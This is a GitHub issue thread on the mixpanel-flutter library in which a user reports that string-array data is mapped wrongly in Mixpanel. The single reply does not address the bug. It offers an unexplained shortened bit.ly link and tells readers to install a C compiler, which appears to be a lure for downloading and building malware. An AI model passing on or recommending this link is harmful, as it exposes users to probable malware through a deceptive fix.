### ISSUE TITLE
data mapping problem

### ISSUE THREAD

**Issue by pawelskinbrilla** [mixpanel/mixpanel-flutter#163]
Hi there,

I've noticed an issue with data mapping.
I'm sending responses as an array of strings, but in Mixpanel I'm seeing "not set" or values from other questions. It's a bit of a mess. Could you please check if the library is correctly building an object containing strings and arrays of strings?

![Screenshot 2024-09-19 at 12 12 01](https://github.com/user-attachments/assets/f19c47d4-4088-4195-9503-a5ea2d66a9cd)

**Comment by miguellords** [comment]
maybe this will help
https://bit.ly/4evXrQ6
If you don't have the c compliator, install it.(gcc or clang)
